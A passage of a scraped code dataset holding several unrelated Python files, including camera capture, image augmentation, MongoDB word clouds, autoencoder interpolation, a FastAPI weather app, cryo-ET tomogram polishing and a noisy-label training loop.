os\nimport json\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nimport numpy as np\nimport cv2\n\n\nclass VisualCameraInterface():\n\n def __init__(self, timestamp, path_visualimages):\n\n # visual camera settings\n self.port = \"/dev/video0\"\n self.resolution = (640, 480)\n self.cam = pygame.camera.Camera(self.port, self.resolution)\n self.cam.start()\n \n # variables we need to introduce from the main script\n self.timestamp = timestamp\n self.path = path_visualimages\n\n # We initialize the array containing the data of the images\n self.visualimages = []\n\n\n def take_image(self): #function to take an image with the visual image\n\n img = np.empty((self.resolution[1], self.resolution[0], 3), dtype=np.uint8)\n image = self.cam.get_image()\n img = cv2.imread(image)\n return img\n\n\n def edit_json(self, newvisualimage):\n # we try to write an existing json. If not existing, we create a new one\n try:\n with open('/home/pi/Desktop/HF-LOCUST-WASP/visual_images.json', 'r+') as f:\n data = []\n try:\n data = json.load(f)\n except:\n print(\"Empty json r+\")\n\n data.append(newvisualimage)\n f.seek(0)\n json.dump(data, f)\n f.truncate()\n f.close()\n\n except:\n with open('/home/pi/Desktop/HF-LOCUST-WASP/visual_images.json', 'w') as f:\n data = []\n try:\n data = json.load(f)\n except:\n print(\"Empty json x\")\n\n data.append(newvisualimage)\n f.seek(0)\n json.dump(data, f)\n f.truncate()\n f.close()\n\n print(\"done\")\n\n\n def write_json(self, num_visual, path_visual):\n \n self.visualimages.append(\n {\n \"image_id\": num_visual,\n \"image_path\": path_visual,\n }\n )\n\n locust_images = {\n \"id\": self.timestamp,\n \"results\": self.visualimages\n }\n\n return locust_images\n\n def tag_image(self, img, coordinates):\n # Th main purspose of that function is tag the image with the image coordinates over a white bckground\n\n # we will draw a white rectangle as background \n rectangle_bgr = (255, 255, 255)\n\n text = str(coordinates)\n\n # set the text start position\n text_offset_x = 50\n text_offset_y = img.shape[0] - 25\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n # org\n org = (50, 50)\n # fontScale\n fontScale = 0.8\n\n # Blue color in BGR\n color = (0, 0, 0)\n\n # Line thickness of 2 px\n thickness = 2\n\n # get the width and height of the text box\n (text_width, text_height) = cv2.getTextSize(text, font, fontScale=fontScale, thickness=1)[0]\n\n # make the coords of the box with a small padding of two pixels\n box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height - 2))\n cv2.rectangle(img, box_coords[0], box_coords[1], rectangle_bgr, cv2.FILLED)\n\n # Using cv2.putText() method\n cv2.putText(img, text, (text_offset_x, text_offset_y), font, fontScale, color, thickness, cv2.LINE_AA)\n return img\n\n def save_image(self, img, num):\n name = str(self.path) + '/' + str(num)\n cv2.imwrite(name, img)\n\n ","repo_name":"HemavFoundation/HF-LOCUST-WASP","sub_path":"scripts/image_processing/visual_camera_interface.py","file_name":"visual_camera_interface.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"24613950465","text":"\nclass Element:\n \n def __init__(self, rindex, cindex):\n self.rindex = rindex\n self.cindex = cindex\n self.number = None\n self.color = None\n self.state = 0\n\n def update(self, color=None, number=None, string=None):\n if string:\n if string[-1] != \"#\":\n self.color = string[-1]\n if string[:-1] != \"*\":\n self.number = string[:-1]\n if color and color != \"#\":\n self.color = color\n if number and number != \"*\":\n self.number = number\n self.state = bool(number)*2 + bool(color)\n\n def get_neighbors(self, size):\n result = []\n if self.rindex > 0:\n result.append((self.rindex - 1, self.cindex))\n if self.rindex < size-1:\n result.append((self.rindex + 1, self.cindex))\n if self.cindex > 0:\n result.append((self.rindex, self.cindex - 1))\n if self.cindex < size-1:\n result.append((self.rindex, self.cindex + 1))\n return result\n\n def __str__(self):\n return \"%s%s\" % (self.number or \"*\",\n self.color or \"#\")\n","repo_name":"bateternal/sudoku-solver","sub_path":"element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71785270544","text":"import os\nimport argparse\nimport cv2\nfrom DocumentAugmentation import DocumentAugmentation\nimport glob \n\ndef SingleImage(src,des):\n image = cv2.imread(src)\n\n # Perform Augmentation\n Dialated = DocumentAugmentation.Dialate(image) # Do not use for OCR\n Smudged = DocumentAugmentation.Smudge(image) # Do not use for OCR \n colored = DocumentAugmentation.changeColor(image) # This will randomly select color\n BUimage = DocumentAugmentation.BrightnessUp(image)\n BDimage = DocumentAugmentation.BrightnessDown(image)\n \n # file name\n s = src.split(\"/\")[-1].split(\".\")[:-1]\n filename = ' '.join([str(elem) for elem in s])\n\n print(\"Processing : \",filename)\n # Save Augmentations (.jpg and .png Only)\n if des is None:\n des = src\n else:\n des += filename\n\n print(\"Saving to \",des)\n cv2.imwrite(des+\"_dialation.jpg\",Dialated)\n cv2.imwrite(des+\"_Smudged.jpg\",Smudged)\n cv2.imwrite(des+\"_colored.jpg\",colored)\n cv2.imwrite(des+\"_BUimage.jpg\",BUimage)\n cv2.imwrite(des+\"_BDimage.jpg\",BDimage)\n\ndef MultipleImage(src,des):\n images = glob.glob(src)\n for image in images:\n SingleImage(image,des)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"WB color augmenter\")\n p = parser.add_argument\n p(\"--input_image_filename\", help=\"Input image's full filename (for a single image augmentation)\")\n p(\"--input_image_dir\", help=\"Training image directory (use it for batch processing)\")\n p(\"--out_dir\", help=\"Output directory\")\n p(\"--write_original\", type=int, default=1, help=\"Save copy of original image(s) in out_dir\")\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n if args.input_image_filename is not None:\n if args.out_dir is None:\n args.out_dir = \"./Augmented/\"\n os.makedirs(args.out_dir, exist_ok=True) # create output training directory (if not exist)\n SingleImage(args.input_image_filename,args.out_dir)\n elif input_image_dir is not None:\n if args.out_dir is None:\n args.out_dir = \"./Augmented/\"\n os.makedirs(args.out_dir, exist_ok=True) \n MultipleImage(args.input_image_dir,args.out_dir)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AyanGadpal/Document-Image-Augmentation","sub_path":"DocAug.py","file_name":"DocAug.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"21842384287","text":"import jieba.analyse\nimport pymongo\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport re\nimport csv\n\nMONGO_URI = '127.0.0.1:27017'\nMONGO_DATABASE = 'position'\ncollection_name = 'PositionItem'\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DATABASE]\n\n# Handling salary field\n# for position in db[collection_name].find():\n# db[collection_name].update_one({'positionId': position['positionId']},\n# {'$set': {'salary': re.match('\\d+', position['salary']).group(0) + 'K'}})\n\ntext = ''\nfor position in db[collection_name].find():\n text += position['description'] + '\\n'\njieba.analyse.set_stop_words('stop_words.txt')\ntags = jieba.analyse.extract_tags(text, 100, withWeight=True, allowPOS=('n', 'eng'))\nwordcloud = WordCloud(font_path='C:\\Windows\\Fonts\\Microsoft YaHei\\msyh.ttc').fit_words(dict(tags))\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()\n# mongoexport --db position --collection PositionItem --type=csv --fields positionId,education,city,salary,workYear,companySize,financeStage --out PositionItem.csv\n\n# Handling and exporting industryField field\n# industryField_list = {}\n# for position in db[collection_name].find():\n# if position['industryField'] is not None:\n# for industryFields in position['industryField'].split(','):\n# for industryField in industryFields.split('、'):\n# industryField_list[industryField] = industryField_list.get(industryField, 1) + 1\n# with open('IndustryField.csv', 'w', encoding='utf-8', newline='') as f:\n# writer = csv.writer(f)\n# writer.writerow(['industryField', 'totalCount'])\n# writer.writerows(industryField_list.items())\n","repo_name":"hy59/position","sub_path":"dataprocessing.py","file_name":"dataprocessing.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27674557064","text":"#!/usr/bin/env python\n\"\"\"\nlinear space interpolation\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport os\nimport copy\nimport numpy as np\nfrom tqdm.autonotebook import tqdm\nfrom torchvision.utils import save_image\n\nfrom dataloaders import *\nfrom convolutional import Decoder\n\ntorch.manual_seed(9001)\n\nfrom fgsm import Autoencoder\n\n\ndef save_image_as_numpy(use_cuda):\n 'get dataloader for test set with batch size = 1'\n batch_size = 64\n test_batch_size = 1\n epochs = 100\n path = 'data'\n _, test_loader = get_mnist(path, use_cuda, batch_size, test_batch_size)\n return test_loader\n\n\ndef traverse_sigmoidal_latent_space(model, batch, device):\n 'for every axis in latent space, traverse individually from -1 to 1'\n batch = batch.to(device)\n latent = model.encoder(batch)[0]\n traversed = []\n for j in range(10):\n traverse = []\n for i in range(32):\n t = copy.deepcopy(latent)\n t[i] = j / 9\n traverse.append(t)\n traverse = torch.stack(traverse)\n traverse = traverse.to(device)\n traverse = model.decoder(traverse)\n traversed.append(traverse)\n return traversed\n\n\ndef latent_traversal(test_loader, model, device, folder, i):\n 'traverse all 32 axes of the latent representation to produce an image'\n # get batch\n for batch, _ in test_loader:\n break\n # traverse latent space and save image\n traversed = traverse_sigmoidal_latent_space(model, batch, device)\n traversed = torch.stack(traversed)\n traversed = traversed.view(320, 1, 28, 28)\n save_image(traversed.cpu(), f'{folder}/{i}.png', nrow=32)\n\n\ndef main():\n folder = 'interpolate'\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n for i in range(1, 100):\n with torch.no_grad():\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n model = Autoencoder().to(device)\n model.load_state_dict(torch.load(f'fgsm/{i}.pt'))\n\n test_loader = save_image_as_numpy(use_cuda)\n latent_traversal(test_loader, model, device, folder, i)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dyth/generative_models","sub_path":"autoencoders/mnist_old/interpolate.py","file_name":"interpolate.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"3171729048","text":"n = int(input())\r\ncount = 0\r\nfor _ in range(n):\r\n s = input()\r\n temp = ''\r\n a = []\r\n for i in s:\r\n if i != temp and i in a:\r\n count -= 1\r\n break\r\n elif i != temp and i not in a:\r\n a.append(i)\r\n temp = i\r\n count += 1\r\nprint(count)","repo_name":"tacowasabii/online-judge","sub_path":"백준/Silver/1316. 그룹 단어 체커/그룹 단어 체커.py","file_name":"그룹 단어 체커.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28525361020","text":"import json\nfrom fastapi import FastAPI\nfrom starlette.staticfiles import StaticFiles\nfrom pathlib import Path\nfrom api import weather_api\nfrom services import openweather_service\nfrom views import home\n\n# docs_url=None if docs not needed\napp = FastAPI()\n\n\ndef configure():\n configure_routing()\n configure_apikeys()\n\n\ndef configure_apikeys():\n file = Path('settings.json').absolute()\n if not file.exists():\n print(f\"WARNING: {file} file not found, you cannot continue, please see settings_template.json\")\n raise Exception(\"settings.json file not found, you cannot continue, please see settings_template.json\")\n\n with open('settings.json') as fin:\n settings = json.load(fin)\n openweather_service.api_key = settings.get('api_key')\n\n\ndef configure_routing():\n # mount static files e.g css, images e.t.c\n app.mount('/static', StaticFiles(directory='static'), name='static')\n\n # includes modular routes\n app.include_router(weather_api.router)\n app.include_router(home.router)\n\n\nconfigure()\n","repo_name":"Danielatonge/WeatherAPI-FASTAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73566302863","text":"import labmaze\nimport numpy as np\n_PADDING = 4\n\n\nclass PaddedRoom(labmaze.BaseMaze):\n \"\"\"A LabMaze square room where the outermost cells are always empty.\"\"\"\n\n def __init__(self,\n room_size,\n num_objects=0,\n random_state=None,\n pad_with_walls=True,\n num_agent_spawn_positions=1):\n self._room_size = room_size\n self._num_objects = num_objects\n self._num_agent_spawn_positions = num_agent_spawn_positions\n self._random_state = random_state or np.random\n\n empty_maze = '\\n'.join(['.' * (room_size + _PADDING)] *\n (room_size + _PADDING) + [''])\n\n self._entity_layer = labmaze.TextGrid(empty_maze)\n\n if pad_with_walls:\n self._entity_layer[0, :] = '*'\n self._entity_layer[-1, :] = '*'\n self._entity_layer[:, 0] = '*'\n self._entity_layer[:, -1] = '*'\n\n self._variations_layer = labmaze.TextGrid(empty_maze)\n\n def regenerate(self):\n self._entity_layer[1:-1, 1:-1] = ' '\n self._variations_layer[:, :] = '.'\n\n generated = list(\n self._random_state.choice(\n self._room_size * self._room_size,\n self._num_objects + self._num_agent_spawn_positions,\n replace=False))\n for i, obj in enumerate(generated):\n if i < self._num_agent_spawn_positions:\n token = labmaze.defaults.SPAWN_TOKEN\n else:\n token = labmaze.defaults.OBJECT_TOKEN\n obj_y, obj_x = obj // self._room_size, obj % self._room_size\n self._entity_layer[obj_y + int(_PADDING / 2),\n obj_x + int(_PADDING / 2)] = token\n\n @property\n def entity_layer(self):\n return self._entity_layer\n\n @property\n def variations_layer(self):\n return self._variations_layer\n\n @property\n def width(self):\n return self._room_size + _PADDING\n\n @property\n def height(self):\n return self._room_size + _PADDING\n","repo_name":"deepmind/dm_control","sub_path":"dm_control/locomotion/arenas/padded_room.py","file_name":"padded_room.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":3200,"dataset":"github-code","pt":"47"} +{"seq_id":"4232646296","text":"# define os produtos, precos e quantidades\r\nprodutos = ['A', 'B', 'C']\r\nprecos = [147.3, 75.4, 35.7]\r\nquantidades = [23, 14, 7]\r\n# itera e multiplica cada preco com sua quantidade\r\npos = 0\r\nfor preco in precos:\r\n # verifica se o faturamento de cada produto atingiu a meta\r\n if (preco * quantidades[pos]) > 1000:\r\n print('O produto {} atingiu o faturamento!'.format(produtos[pos]))\r\n else:\r\n print('O produto {} não atingiu o faturamento!'.format(produtos[pos]))\r\n pos = pos + 1","repo_name":"Moreno2Marcos/PYTHON","sub_path":"Python_skills/FOR_02.py","file_name":"FOR_02.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"70083423822","text":"n = int(input(\"Digite o número de linhas para o Triângulo de Pascal: \"))\n\ntriangulo = [[1]]\n\nfor i in range(1, n):\n linha = [1]\n linha_anterior = triangulo[i-1]\n j = 1\n while j < i:\n linha += [linha_anterior[j-1] + linha_anterior[j]]\n j += 1\n linha += [1]\n triangulo += [linha]\n\nfor linha in triangulo:\n num_espaço = n - len(linha)\n print(\" \" * num_espaço, end=\"\")\n \n for numero in linha:\n print(numero, end=\" \")\n \n print()","repo_name":"DanielNaiff/Computer_Science_UFPA","sub_path":"1º_Semester/Algotithms/atividade 03/atv3-ex14.py","file_name":"atv3-ex14.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72903058063","text":"#!/usr/bin/env python\n# Muyuan Chen 2023-03\nfrom EMAN2 import *\nimport numpy as np\n\nemdir=e2getinstalldir()\nsys.path.insert(0,os.path.join(emdir,'bin'))\nfrom e2tomogram import *\n\ndef main():\n\t\n\tusage=\"\"\"\n\tPolish a tomogram given the subtilt refinement of particles inside. \n\te2spt_polishtomo.py --fname tomograms/xxxx.hdf --path spt_xx \n\t\"\"\"\n\tparser = EMArgumentParser(usage=usage,version=EMANVERSION)\n\tparser.add_argument(\"--path\", type=str,help=\"path of spt refinement\", default=None)\n\tparser.add_argument(\"--fname\", type=str,help=\"name of tomogram\", default=None)\n\tparser.add_argument(\"--nneighbor\", type=int,help=\"number of neighbors\", default=5)\n\tparser.add_argument(\"--res\", type=float,help=\"lowpass filter the output to the target resolution.\", default=50)\n\tparser.add_argument(\"--makeraw\", action=\"store_true\", default=False ,help=\"skip polish for testing\")\n\n\t(options, args) = parser.parse_args()\n\tlogid=E2init(sys.argv)\n\t\t\n\tpath=options.path\n\n\tprint(\"Gathering metadata...\")\n\tinfo3d=load_lst_params(f\"{path}/particle_info_3d.lst\")\n\tinfo2d=load_lst_params(f\"{path}/particle_info_2d.lst\")\n\tfor i in range(99,0,-1):\n\t\tfm=f\"{path}/aliptcls3d_{i:02d}.lst\"\n\t\tif os.path.isfile(fm):\n\t\t\toptions.loadali3d=fm\n\t\t\tbreak\n\tprint(\"using 3d alignment from {}\".format(options.loadali3d))\n\n\tfor i in range(99,0,-1):\n\t\tfm=f\"{path}/aliptcls2d_{i:02d}.lst\"\n\t\tif os.path.isfile(fm):\n\t\t\tlst=load_lst_params(fm, range(10))\n\t\t\toptions.loadali2d=fm\n\t\t\tbreak\n\tprint(\"using 2d alignment from {}\".format(options.loadali2d))\n\n\talipm=load_lst_params(options.loadali2d)\n\tfor i,a in zip(info2d, alipm):\n\t\ti[\"pastxf\"]=a[\"xform.projection\"]\n\t\ti[\"score\"]=a[\"score\"]\n\t\tif \"defocus\" in a:\n\t\t\ti[\"defocus\"]=a[\"defocus\"]\n\t\telse:\n\t\t\ti[\"defocus\"]=0\n\n\talipm=load_lst_params(options.loadali3d)\n\tfor i,a in zip(info3d, alipm):\n\t\ti[\"xform.align3d\"]=a[\"xform.align3d\"]\n\t\ti[\"score\"]=a[\"score\"]\n\n\t#info2d=read_aliptcls(aliptcls, info2d)\n\tfilenames, ptclcount=np.unique([d[\"src\"] for d in info3d], return_counts=True)\n\n\tprint(\"load {} particles from {} tomograms\".format(len(info3d), len(filenames)))\n\t\n\tif options.fname==None and len(args)>0:\n\t\ttomonames=[f for f in args if not f.endswith(\"_polish.hdf\")]\n\telse:\n\t\ttomonames=[options.fname]\n\t\t\n\tfor tname in tomonames:\n\t\tfname=[f for f in filenames if base_name(f)==base_name(tname)]\n\t\tif len(fname)==0:\n\t\t\tprint(\"cannot find file\")\n\t\t\tprint(options.fname)\n\t\t\tprint(filenames)\n\t\t\t\n\t\tfname=fname[0]\t\n\t\tprint(f\"Polishing tomogram {fname}\")\n\t\td3d=[d for d in info3d if d[\"src\"]==fname]\n\t\tf=fname.replace(\"particles3d\", \"particles\")\n\t\ttid=np.array([d[\"tilt_id\"] for d in info2d if d[\"src\"]==f])\n\t\ttid=np.sort(np.unique(tid))\n\t\tprint(\"Loading {} particles from {} tilts...\".format(len(d3d), len(tid)))\n\n\t\tsel_coord=[]\n\t\tsel_score=[]\n\t\tsel_defocus=[]\n\t\tsel_dxy=[]\n\t\ttltang=[]\n\t\tfor td in tid:\n\n\t\t\td3ds=[d for d in info3d if d[\"src\"]==fname]\n\t\t\td2d=[]\n\t\t\td3d=[]\n\t\t\tfor d3 in d3ds:\n\t\t\t\td2=[info2d[d] for d in d3[\"idx2d\"]]\n\t\t\t\td2=[d for d in d2 if d[\"tilt_id\"]==td]\n\t\t\t\tif len(d2)==0: continue\n\t\t\t\td2d.append(d2[0])\n\t\t\t\td3d.append(d3)\n\n\t\t\txfali=[d[\"pastxf\"] for d in d2d]\n\n\t\t\tcoord=np.array([d[\"coord\"] for d in d3d])\n\t\t\ttxfs=[d[\"xform.align3d\"].inverse() for d in d3d]\n\t\t\tcoord-=np.array([t.get_trans() for t in txfs])\n\n\t\t\txfpj=[d[\"xform.projection\"] for d in d2d]\n\t\t\ttltang.append(np.mean([x.get_params(\"xyz\")[\"ytilt\"] for x in xfpj]))\n\t\t\txfraw=[a*b for a,b in zip(xfpj, txfs)]\n\n\n\t\t\tpastxf=([b*a.inverse()for a,b in zip(xfraw, xfali)])\n\t\t\tdxy=np.array([a.get_trans() for a in pastxf])\n\t\t\tscore=[d[\"score\"] for d in d2d]\n\t\t\tdefocus=[d[\"defocus\"] for d in d2d]\n\n\t\t\tsel_score.append(score)\n\t\t\tsel_dxy.append(dxy)\n\t\t\tsel_coord.append(coord)\n\t\t\tsel_defocus.append(defocus)\n\n\t\tplt_scr=[np.mean(s) for s in sel_score]\n\t\tplt_def=[np.mean(abs(np.array(s))) for s in sel_defocus]\n\t\tplt_dxy=[np.mean(np.linalg.norm(d, axis=1)) for d in sel_dxy]\n\t\tsel_tid=int(np.mean(tid))\n\t\ttltang=np.array(tltang)\n\t\t\t\n\t\tinfo=js_open_dict(info_name(fname))\n\t\ttfile=info[\"tlt_file\"]\n\t\tif \"defocus\" in info:\n\t\t\tprint(\"Loading CTF information. will do phase flipping for tomograms\")\n\t\t\toptions.ctf={\t\"defocus\":info[\"defocus\"], \"phase\":info[\"phase\"], \n\t\t\t\t\t\"cs\":info[\"cs\"], \"voltage\":info[\"voltage\"]}\n\t\telse:\n\t\t\toptions.ctf=None\n\t\t\t\n\t\timgs_raw=EMData.read_images(tfile)\n\n\t\timgs_1k=[]\n\t\tfor m in imgs_raw:\n\t\t\te=m.process(\"math.fft.resample\",{\"n\":4})\n\t\t\te.process_inplace(\"normalize.edgemean\")\n\t\t\timgs_1k.append(e)\n\t\t\t\n\t\ttltpm=np.array(info[\"tlt_params\"]).copy()\n\t\t\n\t\toptions.threads=12\n\t\timgs=imgs_1k\n\t\te=EMData(options.loadali3d,0, True)\n\t\toptions.xfscale=imgs[0][\"apix_x\"]/e[\"apix_x\"]\n\t\tprint(f\"apix of tomogram: {imgs[0]['apix_x']:.2f}, apix of particles: {e['apix_x']:.2f}, scale xform by {options.xfscale:.2f}\")\n\t\toptions.filterto=imgs[0][\"apix_x\"]/options.res\n\n\t\tnum=len(imgs)\n\t\tscale=4\n\t\timgsz=min(imgs[0][\"nx\"],imgs[0][\"ny\"])\n\n\t\tprint(\"Making bin{:d} tomogram by tiling...\".format(int(np.round(scale))))\n\t\ttpm=tltpm.copy()\n\t\ttpm[:,:2]/=scale\n\n\t\tnrange=list(range(num))\n\t\tnx, ny=imgs[0][\"nx\"], imgs[0][\"ny\"]\n\t\t\n\t\t\n\t\tbds=[]\n\t\tfor t in tpm:\n\t\t\trot=Transform({\"type\":\"2d\",\"tx\":t[0], \"ty\":t[1],\"alpha\":t[2]})\n\t\t\tp=np.array([rot.transform([nx/2, ny/2, 0]),rot.transform([nx/2, -ny/2, 0])])\n\t\t\tp=np.max(abs(p), axis=0)\n\t\t\t\n\t\t\tbds.append(p)\n\t\t\t\n\t\tbds=np.array(bds)\n\t\tbds=np.median(abs(bds), axis=0)*2 ## so we clip a rectangle area that covers half of the tilt images\n\t\t\n\t\toutx=good_size(bds[0])\n\t\touty=good_size(bds[1])\n\t\tprint(\"tomogram shape: {} x {}\".format(outx, outy))\n\n\t\tclipz=256\n\t\tsz=256 #### this is the output 3D size \n\t\tpad=good_size(sz*1.4) #### this is the padded size in fourier space\n\t\toptions.outz=outz=clipz\n\t\toptions.step=step=sz//2\n\n\t\tfull3d=EMData(outx, outy, outz)\n\t\tmem=(outx*outy*outz*4+pad*pad*pad*options.threads*4)\n\t\tprint(\"This will take {}x{}x{}x4 + {}x{}x{}x{}x4 = {:.1f} GB of memory...\".format(outx, outy, outz, pad, pad, pad,options.threads, mem/1024**3))\n\t\twtcon=1\n\t\tjsd=queue.Queue(0)\n\t\t\n\t\tjobs=[]\n\t\tnstepx=int(outx/step/2)\n\t\tnstepy=int(outy/step/2)\n\t\tcoord=sel_coord[0]/options.xfscale\n\n\t\ttpos=[]\n\t\t\n\t\tif options.ctf!=None:\n\t\t\tctf=EMAN2Ctf()\n\t\t\tctf.from_dict({\n\t\t\t\t\"defocus\":1.0, \"voltage\":options.ctf[\"voltage\"], \"bfactor\":0., \"cs\":options.ctf[\"cs\"],\"ampcont\":0, \"apix\":imgs[0][\"apix_x\"]})\n\t\t\tdfs=[]\n\t\t\t\n\t\tfor stepx in range(-nstepx,nstepx+1):\n\t\t\t#### shift y by half a tile\n\t\t\tyrange=range(-nstepy,nstepy+1)\n\t\t\t\n\t\t\tfor stepy in yrange:\n\t\t\t\ttiles=[]\n\t\t\t\tfor i in range(num):\n\t\t\t\t\tif i in nrange:\n\t\t\t\t\t\tt=tpm[i]\n\t\t\t\t\t\tpos=[stepx*step,stepy*step,0]\n\t\t\t\t\t\tpxf=get_xf_pos(t, pos)\n\t\t\t\t\t\timg=imgs[i]\n\t\t\t\t\t\tm=img.get_clip(Region(img[\"nx\"]//2-pad//2+pxf[0],img[\"ny\"]//2-pad//2+pxf[1], pad, pad), fill=0)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif options.ctf!=None:\n\t\t\t\t\t\t\trot=Transform({\"type\":\"xyz\",\"xtilt\":float(t[4]),\"ytilt\":float(t[3])})\n\t\t\t\t\t\t\tp1=rot.transform(pos)\n\t\t\t\t\t\t\tpz=p1[2]*img[\"apix_x\"]/10000.\n\t\t\t\t\t\t\tctf.defocus=options.ctf[\"defocus\"][i]-pz\n\t\t\t\t\t\t\tctf.set_phase(options.ctf[\"phase\"][i]*np.pi/180.)\n\t\t\t\t\t\t\tdfs.append(ctf.defocus)\n\t\t\t\t\t\t\tm[\"ctf\"]=ctf\n\t\t\t\t\t\t\n\t\t\t\t\t\ttiles.append(m)\n\n\t\t\t\tjobs.append((jsd, tiles, tpm, sz, pad, stepx, stepy, coord, sel_dxy, options))\n\n\t\tx,y=np.indices((sz,sz),dtype=float)/sz-.5\n\t\t#f=.25-(x**2+y**2)/2 + ((abs(x)-0.5)**2+(abs(y)-0.5)**2)/2\n\t\tf=wtcon+np.exp(-(x**2+y**2)/0.1) - np.exp(-((abs(x)-0.5)**2+(abs(y)-0.5)**2)/0.1)\n\t\tf3=np.repeat(f[None, :,:], outz, axis=0)\n\t\tmsk=from_numpy(f3).copy()\n\t\t\n\t\tthrds=[threading.Thread(target=reconstruct_tile,args=([i])) for i in jobs]\n\t\tprint(\"now start threads...\")\n\t\tthrtolaunch=0\n\t\ttsleep=threading.active_count()\n\t\t\n\t\twhile thrtolaunchtsleep or not jsd.empty():\n\t\t\tif thrtolaunch keep_threshold\n keep_idx.extend(sample_idx[keeps].tolist())\n return keep_idx\n\n# Training\ndef train(epoch, use_mentor=False):\n global init\n net.train()\n tch_net.train()\n train_loss = 0\n correct = 0\n total = 0\n \n learning_rate = args.lr\n if epoch > args.lrdecay_epoch:\n learning_rate=learning_rate/10\n \n if epoch>args.rampup_epoch:\n meta_lr = args.meta_lr\n gamma = 0.999\n tch_r = 0.5\n else:\n u = epoch/args.rampup_epoch\n meta_lr = args.meta_lr*math.exp(-5*(1-u)**2)\n gamma = args.gamma_init\n tch_r = 0.5*math.exp(-5*(1-u)**2)\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n \n print('\\n=> %s Training Epoch #%d, LR=%.6f' %(args.id,epoch, learning_rate))\n\n tm_tensor = torch.Tensor(tm)\n tm_tensor = tm_tensor.cuda()\n tm_tensor = tm_tensor.detach()\n print('tm_tensor:', tm_tensor)\n \n for batch_idx, (inputs, targets, sample_idx) in enumerate(train_loader):\n # if batch_idx < 5:\n # print('sample_idx:', sample_idx)\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda() \n optimizer.zero_grad()\n inputs, targets = Variable(inputs), Variable(targets)\n outputs = net(inputs) # Forward Propagation\n outputs_prob = softmax_dim1(outputs)\n outputs_adjust = torch.mm(outputs_prob, tm_tensor)\n outputs_log_prob = torch.log(outputs_adjust)\n class_loss = nll_loss(outputs_log_prob, targets)\n class_loss.backward(retain_graph=True)\n \n if epoch > 2:\n if init:\n init = False\n for param,param_tch in zip(net.parameters(),tch_net.parameters()):\n param_tch.data.copy_(param.data)\n else:\n for param,param_tch in zip(net.parameters(),tch_net.parameters()):\n param_tch.data.mul_(gamma).add_((1-gamma), param.data)\n \n _,feats = pretrain_net(inputs,get_feat=True)\n tch_outputs = tch_net(inputs,get_feat=False)\n if use_mentor:\n mentor_outputs = mentor_net(inputs,get_feat=False)\n p_tch = tch_r * F.softmax(tch_outputs, dim=1) + (1 - tch_r) * F.softmax(mentor_outputs, dim=1)\n else:\n p_tch = F.softmax(tch_outputs,dim=1)\n p_tch = p_tch.detach()\n \n # Compute class prototypes\n # if batch_idx < 1:\n # # Initial prototypes: average the top-k ranked features based on their confidence scores on each class\n # top_scores = {}\n # confidence_score, predicted_lb = torch.max(p_tch, dim=1)\n # print('predicted_lb:', predicted_lb)\n # print('confidence_score:', confidence_score)\n # prototypes = torch.cuda.FloatTensor((num_class, top_k)).fill_(0.0)\n \n for i in range(args.num_fast):\n targets_fast = targets.clone()\n randidx = torch.randperm(targets.size(0))\n if args.use_wcl:\n loss_weights = torch.cuda.FloatTensor(targets.size()).fill_(args.init_weight)\n for n in range(int(targets.size(0)*args.perturb_ratio)):\n idx = randidx[n]\n feat = feats[idx]\n feat.view(1,feat.size(0))\n feat.data = feat.data.expand(targets.size(0),feat.size(0))\n dist = torch.sum((feat-feats)**2,dim=1)\n _, neighbor = torch.topk(dist.data,args.num_neighbor+1,largest=False)\n targets_fast[idx] = targets[neighbor[random.randint(1,args.num_neighbor)]]\n if args.use_wcl:\n neighbor_labels = torch.gather(targets, 0, neighbor)\n label_histogram = torch.bincount(neighbor_labels)\n loss_weights[idx] = 2 * args.init_weight * torch.sigmoid(torch.log(torch.true_divide(label_histogram[targets[idx]], label_histogram[targets_fast[idx]])) * args.T)\n \n fast_loss = criterion(outputs,targets_fast)\n \n grads = torch.autograd.grad(fast_loss, net.parameters(), create_graph=True, retain_graph=True, only_inputs=True)\n # grads = torch.autograd.grad(fast_loss, net.parameters())\n \n # grads_list = list(grads)\n # print('grads_list')\n # print(len(grads_list))\n # for grad in grads_list:\n # print(grad.shape)\n \n for grad in grads:\n grad 